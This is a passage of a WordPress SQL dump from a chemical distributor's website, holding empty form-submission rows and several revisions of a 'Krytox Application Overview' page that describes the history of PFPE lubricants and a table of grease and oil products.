INSERT INTO `wp_posts` VALUES (3405, 0, '2017-01-06 12:25:29', '2017-01-06 12:25:29', '', '', '', 'publish', 'closed', 'closed', '', '3405', '', '', '2017-01-06 12:25:30', '2017-01-06 12:25:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/3405/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3407, 0, '2017-01-09 08:43:14', '2017-01-09 08:43:14', '', '', '', 'publish', 'closed', 'closed', '', '3407', '', '', '2017-01-09 08:43:14', '2017-01-09 08:43:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/3407/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3408, 320, '2017-01-09 09:17:55', '2017-01-09 09:17:55', '', '', '', 'publish', 'closed', 'closed', '', '3408', '', '', '2017-01-09 09:17:55', '2017-01-09 09:17:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3408/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3409, 0, '2017-01-09 13:12:44', '2017-01-09 13:12:44', '', '', '', 'publish', 'closed', 'closed', '', '3409', '', '', '2017-01-09 13:12:44', '2017-01-09 13:12:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/3409/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3411, 0, '2017-01-09 14:08:28', '2017-01-09 14:08:28', '', '', '', 'publish', 'closed', 'closed', '', '3411', '', '', '2017-01-09 14:08:28', '2017-01-09 14:08:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3411/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3412, 0, '2017-01-09 15:50:59', '2017-01-09 15:50:59', '', '', '', 'publish', 'closed', 'closed', '', '3412', '', '', '2017-01-09 15:50:59', '2017-01-09 15:50:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/3412/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3413, 0, '2017-01-09 17:16:39', '2017-01-09 17:16:39', '', '', '', 'publish', 'closed', 'closed', '', '3413', '', '', '2017-01-09 17:16:39', '2017-01-09 17:16:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3413/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3414, 0, '2017-01-09 19:56:16', '2017-01-09 19:56:16', '', '', '', 'publish', 'closed', 'closed', '', '3414', '', '', '2017-01-09 19:56:16', '2017-01-09 19:56:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3414/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3415, 0, '2017-01-09 21:22:36', '2017-01-09 21:22:36', '', '', '', 'publish', 'closed', 'closed', '', '3415', '', '', '2017-01-09 21:22:36', '2017-01-09 21:22:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/3415/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3416, 0, '2017-01-10 12:37:15', '2017-01-10 12:37:15', '', '', '', 'publish', 'closed', 'closed', '', '3416', '', '', '2017-01-10 12:37:16', '2017-01-10 12:37:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3416/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3417, 0, '2017-01-10 14:28:12', '2017-01-10 14:28:12', '', '', '', 'publish', 'closed', 'closed', '', '3417', '', '', '2017-01-10 14:28:12', '2017-01-10 14:28:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3417/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3418, 2, '2017-01-10 14:45:27', '2017-01-10 14:45:27', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h3 style="text-align: center;">Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-01-10 14:45:27', '2017-01-10 14:45:27', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3419, 2, '2017-01-10 14:48:37', '2017-01-10 14:48:37', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h3 style="text-align: center;">Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-01-10 14:48:37', '2017-01-10 14:48:37', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3420, 0, '2017-01-10 14:49:36', '2017-01-10 14:49:36', '', '', '', 'publish', 'closed', 'closed', '', '3420', '', '', '2017-01-10 14:49:37', '2017-01-10 14:49:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3420/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3422, 2, '2017-01-10 14:52:20', '2017-01-10 14:52:20', '', 'Krytox', '', 'inherit', 'closed', 'closed', '', 'krytox-2', '', '', '2017-01-10 14:52:27', '2017-01-10 14:52:27', '', 2050, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/Krytox.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3423, 2, '2017-01-10 15:03:28', '2017-01-10 15:03:28', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1 style="text-align: center;">Krytox Application Overview</h1>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical 